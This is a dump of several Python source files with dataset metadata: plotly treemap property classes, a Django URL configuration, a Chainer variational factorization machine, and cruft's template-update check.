def colorsrc(self, val):
self["colorsrc"] = val
@property
def family(self):
return self["family"]
@family.setter
def family(self, val):
self["family"] = val
@property
def familysrc(self):
return self["familysrc"]
@familysrc.setter
def familysrc(self, val):
self["familysrc"] = val
@property
def size(self):
return self["size"]
@size.setter
def size(self, val):
self["size"] = val
@property
def sizesrc(self):
return self["sizesrc"]
@sizesrc.setter
def sizesrc(self, val):
self["sizesrc"] = val
@property
def _parent_path_str(self):
return "treemap"
@property
def _prop_descriptions(self):
return """\
color
colorsrc
Sets the source reference on plot.ly for color .
family
HTML font family - the typeface that will be applied by
the web browser. The web browser will only be able to
apply a font if it is available on the system which it
operates. Provide multiple font families, separated by
commas, to indicate the preference in which to apply
fonts if they aren't available on the system. The
plotly service (at https://plot.ly or on-premise)
generates images on a server, where only a select
number of fonts are installed and supported. These
include "Arial", "Balto", "Courier New", "Droid Sans",,
"Droid Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for family .
size
sizesrc
Sets the source reference on plot.ly for size .
"""
def __init__(
self,
arg=None,
color=None,
colorsrc=None,
family=None,
familysrc=None,
size=None,
sizesrc=None,
**kwargs
):
super(Insidetextfont, self).__init__("insidetextfont")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Insidetextfont
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Insidetextfont"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import insidetextfont as v_insidetextfont
# Initialize validators
# ---------------------
self._validators["color"] = v_insidetextfont.ColorValidator()
self._validators["colorsrc"] = v_insidetextfont.ColorsrcValidator()
self._validators["family"] = v_insidetextfont.FamilyValidator()
self._validators["familysrc"] = v_insidetextfont.FamilysrcValidator()
self._validators["size"] = v_insidetextfont.SizeValidator()
self._validators["sizesrc"] = v_insidetextfont.SizesrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
self["color"] = color if color is not None else _v
_v = arg.pop("colorsrc", None)
self["colorsrc"] = colorsrc if colorsrc is not None else _v
_v = arg.pop("family", None)
self["family"] = family if family is not None else _v
_v = arg.pop("familysrc", None)
self["familysrc"] = familysrc if familysrc is not None else _v
_v = arg.pop("size", None)
self["size"] = size if size is not None else _v
_v = arg.pop("sizesrc", None)
self["sizesrc"] = sizesrc if sizesrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Hoverlabel(_BaseTraceHierarchyType):
# align
# -----
@property
def align(self):
return self["align"]
@align.setter
def align(self, val):
self["align"] = val
# alignsrc
# --------
@property
def alignsrc(self):
return self["alignsrc"]
@alignsrc.setter
def alignsrc(self, val):
self["alignsrc"] = val
# bgcolor
# -------
@property
def bgcolor(self):
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans more two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
super(Hoverlabel, self).__init__("hoverlabel")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import hoverlabel as v_hoverlabel
# Initialize validators
# ---------------------
self._validators["align"] = v_hoverlabel.AlignValidator()
self._validators["alignsrc"] = v_hoverlabel.AlignsrcValidator()
self._validators["bgcolor"] = v_hoverlabel.BgcolorValidator()
self._validators["bgcolorsrc"] = v_hoverlabel.BgcolorsrcValidator()
self._validators["bordercolor"] = v_hoverlabel.BordercolorValidator()
self._validators["bordercolorsrc"] = v_hoverlabel.BordercolorsrcValidator()
self._validators["font"] = v_hoverlabel.FontValidator()
self._validators["namelength"] = v_hoverlabel.NamelengthValidator()
self._validators["namelengthsrc"] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
self["align"] = align if align is not None else _v
_v = arg.pop("alignsrc", None)
self["alignsrc"] = alignsrc if alignsrc is not None else _v
_v = arg.pop("bgcolor", None)
self["bgcolor"] = bgcolor if bgcolor is not None else _v
_v = arg.pop("bgcolorsrc", None)
self["bgcolorsrc"] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop("bordercolor", None)
self["bordercolor"] = bordercolor if bordercolor is not None else _v
_v = arg.pop("bordercolorsrc", None)
self["bordercolorsrc"] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("namelength", None)
self["namelength"] = namelength if namelength is not None else _v
_v = arg.pop("namelengthsrc", None)
self["namelengthsrc"] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
# column
# ------
@property
def column(self):
return self["column"]
@column.setter
def column(self, val):
self["column"] = val
# row
# ---
@property
def row(self):
return self["row"]
@row.setter
def row(self, val):
self["row"] = val
# x
# -
@property
def x(self):
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
"""
def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
super(Domain, self).__init__("domain")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import domain as v_domain
# Initialize validators
# ---------------------
self._validators["column"] = v_domain.ColumnValidator()
self._validators["row"] = v_domain.RowValidator()
self._validators["x"] = v_domain.XValidator()
self._validators["y"] = v_domain.YValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("column", None)
self["column"] = column if column is not None else _v
_v = arg.pop("row", None)
self["row"] = row if row is not None else _v
_v = arg.pop("x", None)
self["x"] = x if x is not None else _v
_v = arg.pop("y", None)
self["y"] = y if y is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
__all__ = [
"Domain",
"Hoverlabel",
"Insidetextfont",
"Marker",
"Outsidetextfont",
"Pathbar",
"Stream",
"Textfont",
"Tiling",
"hoverlabel",
"marker",
"pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
| true
| true
|
f705372d8ae86131f8816526842556b71e7b9ae5
| 337
|
py
|
Python
|
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | null | null | null |
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | 2
|
2021-06-10T22:33:39.000Z
|
2021-09-08T01:39:21.000Z
|
insta/urls.py
|
osman2491/Insta
|
f941f2b20f814e1c13fe0f9c02a1a60be3cd2c87
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('instagram.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
]
| 33.7
| 69
| 0.682493
|
from django.conf.urls import url,include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('instagram.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
]
| true
| true
|
f705378db8f82576f4e65044784728515b32f0c3
| 10,546
|
py
|
Python
|
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
"MIT"
] | null | null | null |
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
"MIT"
] | null | null | null |
vfm.py
|
jilljenn/vfm
|
4cb2f5157ee7301321bb4babedb62223a720d231
|
[
"MIT"
] | 1
|
2020-01-15T07:06:52.000Z
|
2020-01-15T07:06:52.000Z
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
""" Simple dot product"""
return F.sum(a * b, axis=-1)
def batch_interactions(x):
xp = cuda.get_array_module(x.data)
batchsize = x.shape[0]
shape = (batchsize, x.shape[1] ** 2)
left = xp.tile(x.data, (1, x.shape[1]))
right = xp.repeat(x.data, x.shape[1]).reshape(shape)
return left, right
class VFM(Chain):
lv_floor = -100.0
def __init__(self, n_features=None, n_dim=1 , lossfun=F.mean_squared_error,
lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
init_bias_lv=0.0, intx_term=True, total_nobs=1):
self.n_dim = n_dim
self.n_features = n_features
self.lossfun = lossfun
self.lambda0 = lambda0
self.lambda1 = lambda1
self.lambda2 = lambda2
self.intx_term = intx_term
self.total_nobs = total_nobs
# In contrast to the FM model, the slopes and latent vectors
# will have means (mu) and log variances (lv) for each component.
super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
bias_lv=L.Bias(shape=(1,)),
slop_mu=L.Bias(shape=(1, 1)),
slop_lv=L.Bias(shape=(1, 1)),
slop_delta_mu=L.EmbedID(n_features, 1,
ignore_label=-1),
slop_delta_lv=L.EmbedID(n_features, 1,
ignore_label=-1),
feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
feat_delta_mu=L.EmbedID(n_features, n_dim,
ignore_label=-1),
feat_delta_lv=L.EmbedID(n_features, n_dim,
ignore_label=-1))
# Xavier initialize weights
c = np.sqrt(n_features * n_dim) * 1e3
d = np.sqrt(n_features) * 1e3
self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
self.bias_mu.b.data[...] *= 0.0
self.bias_mu.b.data[...] += init_bias_mu
self.bias_lv.b.data[...] *= 0.0
self.bias_lv.b.data[...] += init_bias_lv
def term_bias(self, bs, train=True):
""" Compute overall bias and broadcast to shape of batchsize
"""
shape = (bs, 1,)
# Bias is drawn from a Gaussian with given mu and log variance
bs_mu = F.broadcast_to(self.bias_mu.b, shape)
bs_lv = F.broadcast_to(self.bias_lv.b, shape)
bias = F.flatten(F.gaussian(bs_mu, bs_lv))
# Add a very negative log variance so we're sampling
# from a very narrow distribution about the mean.
# Useful for validation dataset when we want to only guess
# the mean.
if not train:
bs_lv += self.lv_floor
# Compute prior on the bias, so compute the KL div
# from the KL(N(mu_bias, var_bias) | N(0, 1))
kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
return bias, kld
def term_slop(self, loc, val, bs, nf, train=True):
""" Compute the slope for each active feature.
"""
shape = (bs, nf)
# Reshape all of our constants
pr_mu = F.broadcast_to(self.slop_mu.b, shape)
pr_lv = F.broadcast_to(self.slop_lv.b, shape)
# This is either zero or a very negative number
# indicating to sample N(mean, logvar) or just draw
# the mean preicsely
if not train:
pr_lv += self.lv_floor
# The feature slopes are grouped together so that they
# all share a common mean. Then individual features slop_delta_lv
# are shrunk towards zero, which effectively sets features to fall
# back on the group mean.
sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
coef = F.gaussian(sl_mu, sl_lv)
slop = F.sum(coef * val, axis=1)
# Calculate divergence between group mean and N(0, 1)
kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
# Calculate divergence of individual delta means and delta vars
args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
kld2 = F.gaussian_kl_divergence(*args)
return slop, kld1 + kld2
def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
# Change all of the shapes to form interaction vectors
shape = (bs, nf * 2, self.n_dim)
feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
if not train:
feat_lv_vec += self.lv_floor
# Construct the interaction mean and variance
# iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
# dot(feat, feat) is (bs, nf)
ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
feat_lv_vec + self.feat_delta_lv(iloc))
jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
feat_lv_vec + self.feat_delta_lv(jloc))
# feat is (bs, )
feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
# Compute the KLD for the group mean vector and variance vector
kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
# Compute the KLD for vector deviations from the group mean and var
kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
self.feat_delta_lv.W)
return feat, kld1 + kld2
def forward(self, loc, val, y, train=True):
""" Given the sparse feature vector defined by location
integers for the column index and the value at that index.
y ~ c + sum(w_i x_i) + sum_ij( <v_i, v_j> * x_i * x_j)
Parameters
----------
val : array of float
Values in the feature array. Should of shape (batchsize, n_feat_max)
loc : array of int
Location of the non-zero columns in the sparse vector. Should be of
shape (batchsize, n_feat_max)
y : array of float
Array of expected outcome.
train: bool
If True uses the reparameterization trick to estimate variables.
If False, this sets the variance to nearly zero such that
parameters are always set to the mean with no noise, which is useful
at test time.
"""
bs = val.data.shape[0]
nf = val.data.shape[1]
iloc, jloc = batch_interactions(loc)
ival, jval = batch_interactions(val)
# Compute scalar bias term
bias, kld0 = self.term_bias(bs, train=train)
# Compute the feature weights
slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
# Compute factorized weights on interaction features
feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
bs, nf, train=train)
# Optionally choose to include the interaction term
# without this is linear regression
pred = bias + slop
if self.intx_term:
pred += feat
return pred, kld0, kld1, kld2
def __call__(self, loc, val, y, train=True):
bs = val.data.shape[0]
pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
# Compute MSE loss
mse = F.mean_squared_error(pred, y)
rmse = F.sqrt(mse) # Only used for reporting
# Now compute the total KLD loss
kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
# Total loss is MSE plus regularization losses
loss = mse + kldt * (1.0 / self.total_nobs)
# Log the errors
logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
reporter.report(logs, self)
return loss
class TestModeEvaluator(extensions.Evaluator):
def evaluate(self):
model = self.get_target('main')
model.train = False
ret = super(TestModeEvaluator, self).evaluate()
model.train = True
return ret
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
resume=None, alpha=1e-3):
if device >= 0:
chainer.cuda.get_device(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(alpha)
optimizer.setup(model)
# Setup iterators
train_iter = chainer.iterators.SerialIterator(train, batchsize)
valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (n_epoch, 'epoch'),
out='out_' + str(device))
# Setup logging, printing & saving
keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1']
keys += ['kldg', 'kldi', 'hypg', 'hypi']
keys += ['hypglv', 'hypilv']
reports = ['epoch']
reports += ['main/' + key for key in keys]
reports += ['validation/main/rmse']
trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
trainer.extend(extensions.PrintReport(reports))
trainer.extend(extensions.ProgressBar(update_interval=10))
# If previous model detected, resume
if resume:
print("Loading from {}".format(resume))
chainer.serializers.load_npz(resume, trainer)
# Run the model
trainer.run()
| 39.94697
| 79
| 0.592737
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
return F.sum(a * b, axis=-1)
def batch_interactions(x):
xp = cuda.get_array_module(x.data)
batchsize = x.shape[0]
shape = (batchsize, x.shape[1] ** 2)
left = xp.tile(x.data, (1, x.shape[1]))
right = xp.repeat(x.data, x.shape[1]).reshape(shape)
return left, right
class VFM(Chain):
lv_floor = -100.0
def __init__(self, n_features=None, n_dim=1 , lossfun=F.mean_squared_error,
lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
init_bias_lv=0.0, intx_term=True, total_nobs=1):
self.n_dim = n_dim
self.n_features = n_features
self.lossfun = lossfun
self.lambda0 = lambda0
self.lambda1 = lambda1
self.lambda2 = lambda2
self.intx_term = intx_term
self.total_nobs = total_nobs
super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
bias_lv=L.Bias(shape=(1,)),
slop_mu=L.Bias(shape=(1, 1)),
slop_lv=L.Bias(shape=(1, 1)),
slop_delta_mu=L.EmbedID(n_features, 1,
ignore_label=-1),
slop_delta_lv=L.EmbedID(n_features, 1,
ignore_label=-1),
feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
feat_delta_mu=L.EmbedID(n_features, n_dim,
ignore_label=-1),
feat_delta_lv=L.EmbedID(n_features, n_dim,
ignore_label=-1))
c = np.sqrt(n_features * n_dim) * 1e3
d = np.sqrt(n_features) * 1e3
self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
self.bias_mu.b.data[...] *= 0.0
self.bias_mu.b.data[...] += init_bias_mu
self.bias_lv.b.data[...] *= 0.0
self.bias_lv.b.data[...] += init_bias_lv
def term_bias(self, bs, train=True):
shape = (bs, 1,)
bs_mu = F.broadcast_to(self.bias_mu.b, shape)
bs_lv = F.broadcast_to(self.bias_lv.b, shape)
bias = F.flatten(F.gaussian(bs_mu, bs_lv))
# from a very narrow distribution about the mean.
# Useful for validation dataset when we want to only guess
# the mean.
if not train:
bs_lv += self.lv_floor
# Compute prior on the bias, so compute the KL div
# from the KL(N(mu_bias, var_bias) | N(0, 1))
kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
return bias, kld
def term_slop(self, loc, val, bs, nf, train=True):
shape = (bs, nf)
# Reshape all of our constants
pr_mu = F.broadcast_to(self.slop_mu.b, shape)
pr_lv = F.broadcast_to(self.slop_lv.b, shape)
# This is either zero or a very negative number
# indicating to sample N(mean, logvar) or just draw
# the mean preicsely
if not train:
pr_lv += self.lv_floor
# The feature slopes are grouped together so that they
# all share a common mean. Then individual features slop_delta_lv
# are shrunk towards zero, which effectively sets features to fall
# back on the group mean.
sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
coef = F.gaussian(sl_mu, sl_lv)
slop = F.sum(coef * val, axis=1)
# Calculate divergence between group mean and N(0, 1)
kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
# Calculate divergence of individual delta means and delta vars
args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
kld2 = F.gaussian_kl_divergence(*args)
return slop, kld1 + kld2
def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
# Change all of the shapes to form interaction vectors
shape = (bs, nf * 2, self.n_dim)
feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
if not train:
feat_lv_vec += self.lv_floor
# Construct the interaction mean and variance
# iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
# dot(feat, feat) is (bs, nf)
ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
feat_lv_vec + self.feat_delta_lv(iloc))
jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
feat_lv_vec + self.feat_delta_lv(jloc))
# feat is (bs, )
feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
# Compute the KLD for the group mean vector and variance vector
kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
# Compute the KLD for vector deviations from the group mean and var
kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
self.feat_delta_lv.W)
return feat, kld1 + kld2
def forward(self, loc, val, y, train=True):
bs = val.data.shape[0]
nf = val.data.shape[1]
iloc, jloc = batch_interactions(loc)
ival, jval = batch_interactions(val)
# Compute scalar bias term
bias, kld0 = self.term_bias(bs, train=train)
# Compute the feature weights
slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
# Compute factorized weights on interaction features
feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
bs, nf, train=train)
# Optionally choose to include the interaction term
# without this is linear regression
pred = bias + slop
if self.intx_term:
pred += feat
return pred, kld0, kld1, kld2
def __call__(self, loc, val, y, train=True):
bs = val.data.shape[0]
pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
# Compute MSE loss
mse = F.mean_squared_error(pred, y)
rmse = F.sqrt(mse) # Only used for reporting
# Now compute the total KLD loss
kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
# Total loss is MSE plus regularization losses
loss = mse + kldt * (1.0 / self.total_nobs)
# Log the errors
logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
reporter.report(logs, self)
return loss
class TestModeEvaluator(extensions.Evaluator):
def evaluate(self):
model = self.get_target('main')
model.train = False
ret = super(TestModeEvaluator, self).evaluate()
model.train = True
return ret
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
resume=None, alpha=1e-3):
if device >= 0:
chainer.cuda.get_device(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(alpha)
optimizer.setup(model)
# Setup iterators
train_iter = chainer.iterators.SerialIterator(train, batchsize)
valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (n_epoch, 'epoch'),
out='out_' + str(device))
# Setup logging, printing & saving
keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1']
keys += ['kldg', 'kldi', 'hypg', 'hypi']
keys += ['hypglv', 'hypilv']
reports = ['epoch']
reports += ['main/' + key for key in keys]
reports += ['validation/main/rmse']
trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
trainer.extend(extensions.PrintReport(reports))
trainer.extend(extensions.ProgressBar(update_interval=10))
# If previous model detected, resume
if resume:
print("Loading from {}".format(resume))
chainer.serializers.load_npz(resume, trainer)
# Run the model
trainer.run()
| true
| true
|
f70537ece98c2114c69c2bae94f8b653352137eb
| 1,406
|
py
|
Python
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 293
|
2020-08-18T05:52:45.000Z
|
2022-03-31T20:39:43.000Z
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 102
|
2020-08-28T16:38:34.000Z
|
2022-03-31T11:01:41.000Z
|
cruft/_commands/check.py
|
lkubb/cruft
|
0c6de85d974197969c0e65913857eaa36b788e5e
|
[
"MIT"
] | 36
|
2020-08-28T16:34:10.000Z
|
2022-03-31T21:55:53.000Z
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
"""Checks to see if there have been any updates to the Cookiecutter template
used to generate this project."""
cruft_file = utils.cruft.get_cruft_file(project_dir)
cruft_state = json.loads(cruft_file.read_text())
with AltTemporaryDirectory() as cookiecutter_template_dir:
with utils.cookiecutter.get_cookiecutter_repo(
cruft_state["template"],
Path(cookiecutter_template_dir),
checkout,
filter="blob:none",
no_checkout=True,
) as repo:
last_commit = repo.head.object.hexsha
if utils.cruft.is_project_updated(repo, cruft_state["commit"], last_commit, strict):
typer.secho(
"SUCCESS: Good work! Project's cruft is up to date "
"and as clean as possible :).",
fg=typer.colors.GREEN,
)
return True
typer.secho(
"FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
fg=typer.colors.RED,
)
return False
| 32.697674
| 97
| 0.619488
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
cruft_file = utils.cruft.get_cruft_file(project_dir)
cruft_state = json.loads(cruft_file.read_text())
with AltTemporaryDirectory() as cookiecutter_template_dir:
with utils.cookiecutter.get_cookiecutter_repo(
cruft_state["template"],
Path(cookiecutter_template_dir),
checkout,
filter="blob:none",
no_checkout=True,
) as repo:
last_commit = repo.head.object.hexsha
if utils.cruft.is_project_updated(repo, cruft_state["commit"], last_commit, strict):
typer.secho(
"SUCCESS: Good work! Project's cruft is up to date "
"and as clean as possible :).",
fg=typer.colors.GREEN,
)
return True
typer.secho(
"FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
fg=typer.colors.RED,
)
return False
| true
| true
|
f70538f65e8861717efd58fa60cfc24ef08b2d0d
| 3,288
|
py
|
Python
|
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
152997e7589d3bad63181ca78cc296f54ae25aa2
|
[
"Apache-2.0"
] | null | null | null |
tests/components/zha/test_switch.py
|
Squixx/home-assistant
|
